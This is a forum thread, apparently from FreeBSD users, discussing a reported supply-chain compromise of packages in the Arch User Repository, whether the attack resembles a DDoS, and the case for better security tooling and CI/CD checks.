Could what has just happened to the AUR happen to FreeBSD ports?

Eh, just my 2-cents, but in this day and age, I would think that there is always room for improvement in the CI/CD space. Changes need to be verified before further actions are down, if they fail, stop immediately and raise a red flag. In the context of 400+ packages, perhaps a distributed engine will manage that better.

Another reason to avoid user repositories unless you're actively inspecting what you're getting.
 
tOsYZYny said:
Eh, just my 2-cents, but in this day and age, I would think that there is always room for improvement in the CI/CD space. Changes need to be verified before further actions are down, if they fail, stop immediately and raise a red flag. In the context of 400+ packages, perhaps a distributed engine will manage that better.

Another reason to avoid user repositories unless you're actively inspecting what you're getting.
Click to expand...
Its not 400+ packages. Its almost 2000 packages as of today. AUR is still under attack and number of compromised packages is growing fast and its becoming more sophisticated and hard to find.
 
MrBSD said:
Its not 400+ packages. Its almost 2000 packages as of today. AUR is still under attack and number of compromised packages is growing fast and its becoming more sophisticated and hard to find.
Click to expand...
I think, as a cautionary tale, this is a good example of "don't blindly upgrade/update software". But it should give people a reason to think about accepting patches and pull requests (yes, I understand this is more than that).
Tongue in cheek/conspiracy mode:
"This is why you should only use Windows and Government Approved/Controlled applications because we will keep you safe"

To be clear, that was sarcasm (I hope)
 
I was going to say that perhaps we should only use Apple or Microsoft in the same vein ...

I used 400 as that was what was quoted earlier.

To me, this is no different than a DDoS attack, the platform should provide better tools to mitigate this. While we might be immune now, how long.

As the saying goes, the chain is only as strong as the weakest link.
 
tOsYZYny said:
o me, this is no different than a DDoS attack,
Click to expand...
Ummm.... a DDOS is an attack from the outside. This "denial of service" happened from within. The attack vector has magnitude and direction, and they both matter. That is the difference (figuring out where the problem originated, outside or inside) that is actually important to understand when deciding if an incident is a DDOS or not. For reference:

https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/ offers a very nice and simple explanation of what a DDOS is. It's pretty safe to assume that if a service disruption does NOT check the boxes as described in that link, it's most likely NOT a DDOS to begin with, and requires very dfferent approaches to problem solving.
 
astyle I understand and agree with you, but I think tOsYZYny analogy is not far off. What happened/is happening with AUR results in something similar to a DDoS: loss of the asset. DDoS loss of asset is due to external forces, AUR the loss is due to internal.

I'm not trying to speak for him, but that's how I read post #54. I could be wrong, if so everyone can flog me behind the bikeshed.
 
mer said:
astyle I understand and agree with you, but I think tOsYZYny analogy is not far off. What happened/is happening with AUR results in something similar to a DDoS: loss of the asset. DDoS loss of asset is due to external forces, AUR the loss is due to internal.

I'm not trying to speak for him, but that's how I read post #54. I could be wrong, if so everyone can flog me behind the bikeshed.
Click to expand...
I have the suspicion that it's intentional to push for identification facilities around the end-user. Wait for it... They can't verify a user's authenticity without forced centrai suoervision. The end user can no longer be root, like on Android and iOS.
 
I didn't mean it to be literal. I meant that the scope of the attack is large due to how fast AI can generate and obfuscate its tracks that even though this may be surgical now, the sheer volume of it is like a DDoS attack.

In any case, I still suggest that platforms need better tooling around 'security'.
 
  • Like
Reactions: mer
You must log in or register to reply here.
Back
Top